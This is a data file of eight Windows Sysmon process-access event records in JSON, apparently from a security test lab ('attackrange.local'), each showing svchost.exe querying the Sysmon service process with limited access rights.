{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
